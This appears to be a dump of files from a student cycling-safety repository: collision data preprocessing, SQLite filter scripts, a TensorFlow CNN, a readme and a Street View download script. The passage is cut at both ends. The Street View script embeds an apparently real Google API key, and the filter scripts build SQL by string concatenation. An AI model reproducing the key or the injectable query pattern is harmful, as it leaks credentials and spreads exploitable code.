Passing 0\n# Unknown 0\n# Unsafe Lane Change 0\n# Not Stated 0\n# Other Than Driver (or Pedestrian) 0 \n# Unsafe Starting or Backing 0 \n# Following Too Closely 0 \n# Pedestrian Violation 0 \n# Lights 0 \n# Other Improper Driving 0 \n# Pedestrian Right of Way 0 \n# Driving or Bicycling Under the Influence of Alcohol or Drug 0 \n# Impeding Traffic 0 \n# Brakes 0 \n# Other Equipment 0 \n\n\n# In[33]:\n\n\n# convert!\n\ndf_select['pcf_viol_category_is_st'] = np.where(df_select['pcf_viol_category'] == 'Traffic Signals and Signs', 1, 0)\n\n\n# In[ ]:\n\n\n# 3.3 road_cond_1\n\n\n# In[24]:\n\n\ndf_select['road_cond_1'].value_counts()\n\n\n# In[ ]:\n\n\n# mapping rule: only assign a code number for values associated with road characteristics\n\n# No Unusual Condition 0\n# Other 0 \n# Holes, Deep Ruts 1 \n# Not Stated 0 \n# Construction or Repair Zone 2 \n# Loose Material on Roadway 3 \n# Obstruction on Roadway 4 \n# Reduced Roadway Width 5 \n\n\n# In[35]:\n\n\n# convert!\n\ndf_select['road_cond_new_1'] = np.where(df_select['road_cond_1'] == 'Holes, Deep Ruts', 1, 0)\ndf_select['road_cond_new_2'] = np.where(df_select['road_cond_1'] == 'Construction or Repair Zone', 1, 0)\ndf_select['road_cond_new_3'] = np.where(df_select['road_cond_1'] == 'Loose Material on Roadway', 1, 0)\ndf_select['road_cond_new_4'] = np.where(df_select['road_cond_1'] == 'Obstruction on Roadway', 1, 0)\ndf_select['road_cond_new_5'] = np.where(df_select['road_cond_1'] == 'Reduced Roadway Width', 1, 0)\n\n\n# 4. Merge main table and the secondary table\n\n# In[42]:\n\n\n# preview main table (filtered version)\n\ndf_select.head()\n\n\n# In[50]:\n\n\n# filter secondary table with cols needed\n\ndf_2_select = df_2[['cnn_sgmt_pkey', 'daily_ride_qrt', 'daily_ride_eght', 'speed_avg_mta']]\n\n\n# In[51]:\n\n\n# preview filtered version\n# speed_avg_mta has a lot of null values\n\ndf_2_select.describe()\n\n\n# In[53]:\n\n\n# merge\n\ndf_3 = df_select.merge(df_2_select, left_on = 'cnn_sgmt_fkey', right_on = 'cnn_sgmt_pkey', how = 'inner')\n\n\n# In[54]:\n\n\ndf_3.describe()\n\n\n# In[55]:\n\n\ndf_3.head()\n\n\n# 5. group by segment key and agg all features to segment level\n\n# In[58]:\n\n\ndf_sgmt = df_3.groupby('cnn_sgmt_fkey').agg({'case_id_pkey':'size',\n 'pcf_viol_category_is_st':'sum',\n 'cs_injury_4':'sum',\n 'cs_injury_3':'sum',\n 'cs_injury_2':'sum',\n 'cs_injury_1':'sum',\n 'road_cond_new_1':'sum',\n 'road_cond_new_2':'sum',\n 'road_cond_new_3':'sum',\n 'road_cond_new_4':'sum',\n 'road_cond_new_5':'sum',\n 'daily_ride_qrt':'sum',\n 'daily_ride_eght':'sum',\n 'speed_avg_mta':'mean' \n }).reset_index()\n\n\n# In[62]:\n\n\ndf_sgmt.head(10)\n\n\n# In[60]:\n\n\ndf_sgmt.describe()\n\n\n# 6. compute y\n\n# In[65]:\n\n\n# Number of collision/total_trips (measured by daily_ride_qrt)\ndf_sgmt['y_1'] = df_sgmt['case_id_pkey'] * 1. / df_sgmt['daily_ride_qrt']\n\n# Number of collision/total_trips (measured by daily_ride_eght)\ndf_sgmt['y_2'] = df_sgmt['case_id_pkey'] * 1. / df_sgmt['daily_ride_eght']\n\n\n# In[66]:\n\n\ndf_sgmt.head(20)\n\n\n# In[67]:\n\n\ndf_sgmt.to_csv('df_sgmt_agg_20191106.csv', index = False)\n\n\n# In[ ]:\n\n\n\n\n" }, { "alpha_fraction": 0.6708754301071167, "alphanum_fraction": 0.6784511804580688, "avg_line_length": 32.02777862548828, "blob_id": "88f2dc2a5ace9b4308eb4694234126e95df54aeb", "content_id": "ea8235ac5895313e6aaf80d35cc3948818e3264d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 98, "num_lines": 36, "path": "/Scripts/Filter_collision_data_Selene 2.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport sqlite3 as db\nimport os\nimport io\n\ndb_name = \"input_databse_name\"\ncollision = db.connect(db_name)\n\n#For day_of_week, weather, collision_severity, primary_coll_factor, pcf_viol_category, road_cond_1\ndef filter_collision(col_name = \"day_of_week\", select = \"Sunday\"):\n query = 'SELECT * FROM collision WHERE' + col_name + '=' + select\n collision_filtered = pd.read_sql_query(query, collision)\n return collision_filtered\n\n#For collision_time, NOT SURE HOW WE SHOULD PARSE THIS COLUMN\ndef filter_time(select = \"Morning\"):\n time_category = [\"Morning\", \"Afternoon\", \"Sunset\", \"Night\"]\n if select == \"Morning\":\n query = '''SELECT * FROM collision \n WHERE collision_time BETWEEN 600 AND 1200'''\n collision_filtered = pd.read_sql_query(query, collision)\n return collision_filtered\n\ndef query(col_name, select):\n if col_name == \"collision_time\":\n collision_filtered = filter_time(select)\n else:\n collision_filtered = filter_collision(col_name, select)\n return collision_filtered\n\ndef main():\n data_interested = query(\"day_of_week\", \"Sunday\")\n print(data_interested)\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6135135293006897, "alphanum_fraction": 0.616216242313385, "avg_line_length": 20.764705657958984, "blob_id": "aaadd793861ce7e07e35d132a785f6052f2e1e8c", "content_id": "f5301bbaed5be8b258f0497dc024fa6231343548", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 370, "license_type": "no_license", "max_line_length": 66, "num_lines": 17, "path": "/Scripts/collision_by_hour.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport pandas as pd\ndata = pd.read_csv(\"by_hour.csv\")\ndata = data[[\"Hour\", \"Lane\"]]\n\nrollup = pd.crosstab(index=data['Lane'], columns=data['Hour'])\nby_hour = rollup.transpose()\n\nhour = []\nfor i, row in by_hour.iterrows():\n hour.append({\"hour\":str(i), \"no\":row[\"No\"], \"yes\":row[\"Yes\"]})\n" }, { "alpha_fraction": 0.5930799245834351, "alphanum_fraction": 0.6535087823867798, "avg_line_length": 33.21666717529297, "blob_id": "8dd55e0e2eaf30d5407acd3c79270495c62bf6e3", "content_id": "db1cbe1b88277357a8b65e2e6dae0e5677ef13a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2052, "license_type": "no_license", "max_line_length": 102, "num_lines": 60, "path": "/Scripts/Filter_collision_data.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport sqlite3 as db\nimport os\nimport io\n\n#export_var_select > export_var_select.db\ndb_name = \"export_var_select.db\"\ncollision = db.connect(db_name)\n\n#For day_of_week, weather, collision_severity, primary_coll_factor, pcf_viol_category, road_cond_1\ncategory = [\"Day of Week\", \"Weather\", \"Collision Severity\", \"Primary Collision Factor\",\n\"Violation Category\", \"Road Condition\"]\n\ndef filter_collision(col_name = \"day_of_week\", select = \"Sunday\"):\n query = 'SELECT * FROM collision WHERE ' + col_name + '=' + select\n collision_filtered = pd.read_sql_query(query, collision)\n return collision_filtered\n\n\ndef multiple_filter(a):\n '''input a - a list of strings; user's selection\n e.g., a = [day, weather]and day = All, weather = cloudy\n return SQL stmt with multiple filter'''\n category = [day_of_week, weather]\n #get rid of WHERE?\n query = 'SELECT * FROM collision WHERE '\n for c in category:\n if c != \"All\":\n val = a[category.index(c)]\n c_filter = c + '=' + val\n query += c_filter\n return query\n\n\n#For collision_time\ntime_category = [\"6:00am to 8:59am\", \"9:00am to 11:59am\", \"12:00pm to 14:59pm\", \"15:00pm to 17:59pm\", \n\"18:00pm to 20:59pm\", \"21:00pm to 23:59pm\", \"00:00am to 02:59am\", \"03:00am to 05:59am\"]\n\ntime = [\"600 AND 859\", \"900 AND 1159\", \"1200 AND 1459\", \"1500 AND 1759\",\n\"1800 AND 2059\", \"2100 AND 2359\", \"0 AND 259\", \"300 AND 559\"]\n\ndef filter_time(select = \"6:00am to 8:59am\"):\n time_val = time[time_category.index(select)]\n query = \"SELECT * FROM collision WHERE collision_time BETWEEN \" + time_val\n collision_filtered = pd.read_sql_query(query, collision)\n return collision_filtered\n\ndef query(col_name, select):\n if col_name == \"collision_time\":\n collision_filtered = filter_time(select)\n else:\n collision_filtered = filter_collision(col_name, select)\n return collision_filtered\n\ndef main():\n data_interested = query(\"day_of_week\", \"Sunday\")\n print(data_interested)\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.7638404965400696, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 111.26087188720703, "blob_id": "6816f3db2c37a2aadac1b433f9372929713f473c", "content_id": "653fd50d96c44494e6a11f6fccb203255dafb9ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2583, "license_type": "no_license", "max_line_length": 579, "num_lines": 23, "path": "/team64final/readme.txt", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "1. DESCRIPTION - Describe the package in a few paragraphs\n \n All of our data used to display the final findings are preprocessed. The original data files used to train our model are in /CODE/Data folder. Since the street view pictures used to train the model are too big, we only show a few samples in /CODE/Data/Google_Street_View_Examples. Besides, we saved all the steps to process our data in /CODE/Scripts folder. \n\n Our dataset of bicycle collisions are downloaded from TIMS & Transbase Database.They are saved under /CODE/Data. Our Google Street View pictures of San Francisco, CA are downloaded from Google Cloud API. The code used to obtain GSV pictures is in /CODE/Scripts/streetViewAPI.py. And the step to register for Google Cloud API is in /CODE/Scripts/GSV_register.txt.\n\n The training data, which are the risk scores we aggregated from the collision data and the street features data is /CODE/Data/model_data_segment_full_20191109.csv. The steps to process this data is in /CODE/Scripts/model_data_segment_full_20191109.py.\n\n In /CODE/Model contains our trained Random Forest model to calculate our final composite risk score of each street of San Francisco, CA. The python script of trained model is named Open_Image_V4_Object_Detection-inception_resnet_v2.ipynb. Our calculated composite risk score for each street of San Francisco is saved in /CODE/Data/Safe_score_segment.csv, where y2_Scaled is our final score are linearly color scaled to be used to visualize in the map. And each street segment coordinates, which used to map these street, are found by /CODE/Scripts/Segment_score_latlon.ipynb. \n In /CODE/Model/CNN_Image_ZH1129.py contains our trained CNN model to evaluate street safety, this model was served as a validation approach. \n\n In /CODE/Viz, index.html is our constructed web app to display our visualization of the data and findings. /Viz/lib contains all the api library files we use. /Viz/static contains all the static files, such as csv/geojson. Please see 2 to access this web app.\n\n\n2. INSTALLATION - How to install and setup your code\n\n A. Please navigate to directory: ~/team64final/CODE/Viz\n In the command shell, run the following command:\n $ python -m http.server\n\n B. This will set up a local host in your computer. \n (Note: Please use Firefox to view this website).\n A local server address will appear in the shell, copy that address and paste it into your browser address. In case no address is displayed, enter http://0.0.0.0:8000/index.html. Hit enter, you are then in Safe Street for Cyclist's website.\n\n" }, { "alpha_fraction": 0.5439053773880005, "alphanum_fraction": 0.5840016007423401, "avg_line_length": 36.223880767822266, "blob_id": "c068c98d0f04b7a9cdf082fb389e37a2c6667bc1", "content_id": "74bb5029fe90ecb585a9db4c17e7266f5d31c8d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14964, "license_type": "no_license", "max_line_length": 197, "num_lines": 402, "path": "/team64final/CODE/Model/CNN_Image_ZH1129.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom keras.layers import Input, Dense, Activation, ZeroPadding2D, Flatten, Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.models import Model\nfrom keras.preprocessing import image\nfrom keras.models import load_model\nfrom keras import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nfrom keras.utils import plot_model\nfrom PIL import Image\nimport keras.backend as K\nimport tensorflow as tf\nimport keras\nfrom keras.wrappers.scikit_learn import KerasClassifier\nimport csv\nK.set_image_data_format('channels_last')\nfrom matplotlib.pyplot import imshow\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n\nimg_width = 300\nimg_height = 600\nVECTOR_SIZE = 128\nfeatures_SIZE = 7\nBATCH_SIZE = 8\nEPOCHS = 1000\nTRAIN_EXAMPLES = 3849\nTEST_EXAMPLES = 10000\nLR = 0.00001\ndef mean_pred(y_true, y_pred):\n return K.mean(y_pred)\n\n\n# If images have different sizes, we will crop and rotate images. The images are all 300*600, so we don't need this step.\n'''def getCropImgs(img, needRotations=False):\n # img = img.convert('L')\n z = np.asarray(img, dtype=np.int8)\n c = []\n for i in range(3):\n for j in range(4):\n crop = z[512 * i:512 * (i + 1), 512 * j:512 * (j + 1), :]\n\n c.append(crop)\n if needRotations:\n c.append(np.rot90(np.rot90(crop)))\n\n # os.system('cls')\n # print(\"Crop imgs\", c[2].shape)\n\n return c '''\n\n# Get the softmax from folder name\ndef getAsSoftmax(fname):\n if (fname == 'b'):\n return [1, 0, 0, 0]\n elif (fname == 'is'):\n return [0, 1, 0, 0]\n elif (fname == 'iv'):\n return [0, 0, 1, 0]\n else:\n return [0, 0, 0, 1]\n\ndef plot_cdf(data):\n data.sort()\n plotDataset = [[],[]]\n count = len(data)\n for i in range(count):\n\n plotDataset[0].append(float(data[i]))\n plotDataset[1].append((i+1)/count)\n plt.figure(figsize=(20,10))\n plt.plot(plotDataset[0], plotDataset[1], '-', linewidth=2)\n plt.show()\n\n\n# Return all images as numpy array, labels\ndef get_imgs_frm_folder(path):\n \n \n\n x_image = []\n y_image = []\n\n cnt = 0\n for filename in os.listdir(path):\n image_path = os.path.join(path, filename)\n img = Image.open(image_path)\n #print(img.size)\n img = img.convert('RGB')\n img = np.asarray(img, np.float16) #(300, 600, 3)\n #print(img.shape)\n '''\n if len(img.shape) == 2:\n img = np.concatenate((img, img, img), axis=-1)\n #img = np.reshape(img,(min_width,min_height,1))\n print\n '''\n x_image.append(np.divide(img, 255.))\n y_image.append(filename)\n cnt += 1\n\n '''\n crpImgs = getCropImgs(img)\n cnt += 1\n if cnt % 10 == 0:\n print(str(cnt) + \" Images loaded\")\n for im in crpImgs:\n x.append(np.divide(np.asarray(im, np.float16), 255.))\n # Image.fromarray(np.divide(np.asarray(im, np.float16), 255.), 'RGB').show()\n y.append( (foldname))\n # print(getAsSoftmax(foldname))\n '''\n print(\"Images cropped\")\n print(\"Loading as array\")\n print(\"count: \",cnt)\n return x_image, y_image, cnt\n\ndef get_one_hot(data, index):\n for i in index:\n tempdata = data[:,i].reshape(-1, 1)\n enc = OneHotEncoder()\n enc.fit(tempdata)\n tempdata = enc.transform(tempdata).toarray()\n data = np.concatenate((data,tempdata),axis=1)\n for i in reversed(index):\n data = np.delete(data,i,axis=1)\n return data\n\n# Load the dataset\ndef load_dataset(image_path,feats_path, ntype):\n print(\"Loading images..\")\n\n train_set_x_orig, train_set_y_orig, cnt = get_imgs_frm_folder(image_path)\n\n feats_train = pd.read_csv(feats_path)\n \n feats_train = feats_train.fillna(method='backfill') #handle the NAN\n print(feats_train.head())\n X_img = []\n #X_fea = []\n Y = []\n cnt = 0\n for i in range(len(train_set_y_orig)):\n sample = []\n cnt += 1\n try: \n seg_id = train_set_y_orig[i].split('_')[1].split('.')[0]\n except:\n X_img.append(train_set_x_orig[i])\n continue\n if len(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])]) == 0:\n continue\n X_img.append(train_set_x_orig[i])\n \n '''\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_collisions'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_cases_injury_other_visible'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_cases_complaint_of_pain'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_cases_severe'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['num_cases_fatal'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['cyc_ntwrk_yn'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['speed_limit'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['pk_metered_cnt'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['pk_on_st_cnt'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['oneway_yn'] )\n sample.append( float(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['daily_ride_qrt'] ))\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['facility_type'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['surface_type'] )\n sample.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['sharrow'] )\n X_fea.append(sample)\n '''\n Y.append(feats_train[feats_train['f_node_cnn_intrsctn_fkey'].isin([seg_id])].iloc[0]['y'])\n \n \n X_img = np.array(X_img,dtype = np.float)\n if ntype != \"train\":\n return X_img, 0, 0, 0,train_set_y_orig\n print(\"Y < 0.1 \", len([i for i in Y if i > 0 and i < 0.001]))\n print(\"Y < 0.2 \", len([i for i in Y if i > 0.001 and i < 0.002]))\n print(\"Y < 0.4 \", len([i for i in Y if i > 0.002 and i < 0.004]))\n print(\"Y < 0.6 \", len([i for i in Y if i > 0.004 and i < 0.006]))\n print(\"Y < 0.8 \", len([i for i in Y if i > 0.06 and i < 0.008]))\n print(\"Y < 1.0 \", len([i for i in Y if i > 0.08]))\n print(\"Y max: \",max(Y))\n plot_cdf(Y)\n Y = Y / max(Y)\n print(\"Y < 0.1 \", len([i for i in Y if i > 0 and i < 0.01]))\n print(\"Y < 0.2 \", len([i for i in Y if i > 0.01 and i < 0.02]))\n print(\"Y < 0.4 \", len([i for i in Y if i > 0.02 and i < 0.04]))\n print(\"Y < 0.6 \", len([i for i in Y if i > 0.04 and i < 0.06]))\n print(\"Y < 0.8 \", len([i for i in Y if i > 0.06 and i < 0.08]))\n print(\"Y < 1.0 \", len([i for i in Y if i > 0.08]))\n print(\"Y max: \",max(Y))\n Y = np.array(Y,dtype = np.float).reshape((-1,1))\n\n '''\n X_fea = np.array(X_fea)\n #X_fea[:,10] = X_fea[:,10]/X_fea[:,10].max()\n X_fea = get_one_hot(X_fea,index = [5,9,11,12,13])\n X_fea = np.array(X_fea,dtype = np.float)\n X_fea[:,8] = X_fea[:,8]/X_fea[:,8].max()\n print(X_fea.shape)\n '''\n \n print(X_img.shape)\n \n print(Y.shape)\n x_img_train, x_img_test, y_train, y_test = train_test_split(X_img, Y, train_size=0.90, random_state=33)\n #y_train, y_test = train_test_split(Y,train_size=0.70, random_state=33)\n #x_fea_train, x_fea_test = train_test_split(X_fea, train_size=0.70, random_state=33)\n TRAIN_EXAMPLES = len(x_img_train)\n TEST_EXAMPLES = len(x_img_test)\n\n \n print(\"Data load complete\")\n\n return x_img_train, x_img_test, y_train, y_test, train_set_y_orig\n\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, mean=0.0, stddev=0.01)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape = shape)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding = 'SAME')\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize = [1, 2, 2, 1],\n strides = [1, 2, 2, 1], padding = 'SAME')\n\n\ndef train(BATCH_SIZE, epochs,x_img_train, x_img_test, y_train, y_test, name, train_type):#BATCH_SIZE, EPOCHS,x_img_train, x_img_test, y_train, y_test, x_fea_train, x_fea_test\n x_img = tf.placeholder(tf.float32,[None, img_width,img_height,3])\n #x_fea = tf.placeholder(tf.float32,[None, x_fea_train.shape[1]])\n keep_prob = tf.placeholder(\"float\")\n y_ = tf.placeholder(\"float\", [None, 1])\n \n x_image = tf.reshape(x_img, [-1, img_width, img_height, 3]) \n W_conv1 = weight_variable([3, 3, 3, 16])\n b_conv1 = bias_variable([16])\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n h_pool1 = max_pool_2x2(h_conv1)\n \n W_conv2 = weight_variable([3, 3, 16, 32])\n b_conv2 = bias_variable([32])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n h_pool2 = max_pool_2x2(h_conv2)\n\n W_conv3 = weight_variable([3, 3, 32, 64])\n b_conv3 = bias_variable([64])\n h_conv3 = tf.nn.relu(conv2d(h_pool2, W_conv3) + b_conv3)\n h_pool3 = max_pool_2x2(h_conv3)\n\n W_conv4 = weight_variable([3, 3, 64, 128])\n b_conv4 = bias_variable([128])\n h_conv4 = tf.nn.relu(conv2d(h_pool3, W_conv4) + b_conv4)\n h_pool4 = max_pool_2x2(h_conv4)\n\n W_conv5 = weight_variable([3, 3, 128, 256])\n b_conv5 = bias_variable([256])\n h_conv5 = tf.nn.relu(conv2d(h_pool4, W_conv5) + b_conv5)\n h_pool5 = max_pool_2x2(h_conv5)\n\n\n print(\"h_pool5:\",h_pool5.shape)\n\n W_fc1 = weight_variable([10 * 19 * 256, 2048])\n b_fc1 = bias_variable([2048])\n\n h_pool5_flat = tf.reshape(h_pool5, [-1, 10 * 19 * 256])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool5_flat, W_fc1) + b_fc1)\n print(\"h_fc1:\",h_fc1.shape)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n W_fc0 = weight_variable([2048, 4096])\n b_fc0 = bias_variable([4096])\n cnn_out = tf.matmul(h_fc1_drop, W_fc0) + b_fc0\n \n W_fc2 = weight_variable([4096, 2048])\n b_fc2 = bias_variable([2048])\n h_fc2 = tf.nn.relu(tf.matmul(cnn_out, W_fc2) + b_fc2)\n h_fc2 = tf.nn.dropout(h_fc2, keep_prob)\n\n W_fc3 = weight_variable([2048, 1024])\n b_fc3 = bias_variable([1024])\n h_fc3 = tf.nn.relu(tf.matmul(h_fc2, W_fc3) + b_fc3)\n h_fc3 = tf.nn.dropout(h_fc3, keep_prob)\n\n W_fc4 = weight_variable([1024, 512])\n b_fc4 = bias_variable([512])\n h_fc4 = tf.nn.relu(tf.matmul(h_fc3, W_fc4) + b_fc4)\n h_fc4 = tf.nn.dropout(h_fc4, keep_prob)\n\n W_fc5 = weight_variable([512, 256])\n b_fc5 = bias_variable([256])\n h_fc5 = tf.nn.relu(tf.matmul(h_fc4, W_fc5) + b_fc5)\n h_fc5 = tf.nn.dropout(h_fc5, keep_prob)\n\n W_fc6 = weight_variable([256, 128])\n b_fc6 = bias_variable([128])\n h_fc6 = tf.nn.relu(tf.matmul(h_fc5, W_fc6) + b_fc6)\n h_fc6 = tf.nn.dropout(h_fc6, keep_prob)\n\n\n W_fc_out = weight_variable([128, 1])\n b_fc_out = bias_variable([1])\n y_pred = tf.nn.relu(tf.matmul(h_fc6, W_fc_out) + b_fc_out)\n\n print(\"y_pred:\",y_pred.shape)\n\n loss = tf.reduce_mean(tf.square(y_pred - y_))\n\n train_step = tf.train.AdamOptimizer(LR).minimize(loss)\n\n\n x_img_train = np.array(x_img_train)\n print(x_img_train.shape)\n\n\n saver = tf.train.Saver()\n sess = tf.Session() \n #sess.run(tf.initialize_all_variables()) \n sess.run(tf.global_variables_initializer()) \n\n if train_type == \"train\":\n results_train = []\n results_test = []\n for i in range(epochs): \n print(\"epoch:\",i)\n test_losses=[]\n train_losses = []\n\n for j in range(TRAIN_EXAMPLES//BATCH_SIZE):\n _,train_loss = sess.run(fetches = (train_step,loss),\n feed_dict = {x_img:x_img_train[j*BATCH_SIZE:(j+1)*BATCH_SIZE], y_:y_train[j*BATCH_SIZE:(j+1)*BATCH_SIZE], keep_prob:0.2})\n train_losses.append(train_loss)\n print(\"step %d, train_loss %g\" %(i, sum(train_losses) / len(train_losses)))\n results_train.append(sum(train_losses) / len(train_losses))\n for j in range(TEST_EXAMPLES//BATCH_SIZE):\n\n test_loss = sess.run(fetches = (loss), feed_dict = {x_img:x_img_test[j*BATCH_SIZE:(j+1)*BATCH_SIZE], y_:y_test[j*BATCH_SIZE:(j+1)*BATCH_SIZE],\n keep_prob:1.0}) \n test_losses.append(test_loss)\n\n print(\"step %d, test_loss %g\" %(i, sum(test_losses) / len(test_losses)))\n results_test.append(sum(test_losses) / len(test_losses))\n \n save_path_name = \"save_model_collision/CNN.ckpt\"\n saver.save(sess, save_path_name)\n\n x_img_train,y1,y2,y3,name = load_dataset(\"/home/DVA_Group_Project-master/Data/collision_downloads\",\"/home/DVA_Group_Project-master/Data/model_data_segment_full_20191109.csv\", \"sys.argv[1]\")\n f = open(\"result.txt\",'w')\n BATCH_SIZE = 1\n for j in range(x_img_train.shape[0]//BATCH_SIZE):\n pred = sess.run(fetches = (y_pred), feed_dict = {x_img:x_img_train[j*BATCH_SIZE:(j+1)*BATCH_SIZE],\n keep_prob:1.0}) \n f.write(name[j]+\": \")\n f.write(str(pred[0,0])+\"\\t\")\n f.write(\"\\n\")\n f.close()\n\n else:\n model_path = \"save_model_collision/CNN.ckpt\"\n # Restore model weights from previously saved model\n load_path = saver.restore(sess, model_path)\n print(\"Model restored from file: %s\" % model_path)\n\n f = open(\"result.txt\",'w')\n BATCH_SIZE = 1\n for j in range(x_img_train.shape[0]//BATCH_SIZE):\n pred = sess.run(fetches = (y_pred), feed_dict = {x_img:x_img_train[j*BATCH_SIZE:(j+1)*BATCH_SIZE],\n keep_prob:1.0}) \n f.write(name[j]+\": \")\n f.write(str(pred[0,0])+\"\\t\")\n f.write(\"\\n\")\n f.close()\n\n return \n\n\n\n\n#######################################################################\n\nif __name__ == '__main__':\n image_path = \"/home/DVA_Group_Project-master/Data/collision_downloads\"\n feats_path = \"/DVA_Group_Project-master/Data/model_data_segment_full_20191109.csv\"\n if sys.argv[1] != \"train\":\n image_path = \"/home/DVA_Group_Project-master/Data/NewData_1\"\n x_img_train, x_img_test, y_train, y_test, filename = load_dataset(image_path,feats_path, sys.argv[1])\n model = train(BATCH_SIZE, EPOCHS,x_img_train, x_img_test, y_train, y_test,filename, sys.argv[1])\n" }, { "alpha_fraction": 0.49201276898384094, "alphanum_fraction": 0.5463258624076843, "avg_line_length": 16.38888931274414, "blob_id": "fccd5790f514cf96e546f94df1b0efa71722310c", "content_id": "2fdc011351ef8aec6f633296158c690f65ea2621", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 39, "num_lines": 18, "path": "/Data/collision_downloads/rename.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 6 20:52:55 2019\n\n@author: tingli\n\"\"\"\n\nimport os\nimport csv\n\nwith open('names.csv') as f:\n lines = csv.reader(f)\n for line in lines:\n try:\n os.rename(line[0],line[1] )\n except:\n print(line[0],line[1])\n" }, { "alpha_fraction": 0.5853314399719238, "alphanum_fraction": 0.66995769739151, "avg_line_length": 21.171875, "blob_id": "f8e2f30db4b0104eb97ff7eb33982c78e5611059", "content_id": "7890795d7b1bb51d2e11f56c107392e9647930f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1418, "license_type": "no_license", "max_line_length": 127, "num_lines": 64, "path": "/team64final/CODE/Scripts/streetViewApi.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport google_streetview.api\n\n\ncsvExport = pd.read_csv(\"./DVA_Group_Project/Data/TransBase/geo_st_intrsctn.csv\", sep = \",\",usecols = [\"latitude\",\"longitude\"])\n#print(csvExport)\nparams=[]\ncount=0\nfor index, rows in csvExport.iterrows(): \n latitude =rows.latitude\n longitude= rows.longitude\n input_array= {\n\t'size': '600x300', \n\t'location': ''+str(latitude)+','+str(longitude)+'',\n\t'heading': '151.78',\n\t'pitch': '-0.76',\n\t'key': 'AIzaSyB0NpeNQgVuTxfHdkxw2lhl7WCvpWN6GXc'\n}\n count+=1\n print(count)\n print(latitude,longitude)\n params.append(input_array)\nprint(count)\nresults = google_streetview.api.results(params)\n# Preview results\n#results.preview()\n\n# Download images to directory 'downloads'\nresults.download_links('downloads')\n\n# Save links\nresults.save_links('links.txt')\n\n# Save metadata\nresults.save_metadata('metadata.json')\n\n#print(params)\n\n#latitude=37.70941911820\n#longitude=-122.38250569300\n#input_array= {\n#\t'size': '600x300', \n#\t'location': ''+str(latitude)+','+str(longitude)+'',\n#\t'heading': '151.78',\n#\t'pitch': '-0.76',\n#\t'key': 'AIzaSyB0NpeNQgVuTxfHdkxw2lhl7WCvpWN6GXc'\n#}\n#params.append(input_array)\n\n\n\n#params = [{\n#\t'size': '600x300', # max 640x640 pixels\n#\t'location': '37.70941911820,-122.38250569300',\n# ##'46.414382,10.013988',\n#\t'heading': '151.78',\n#\t'pitch': '-0.76',\n#\t'key': 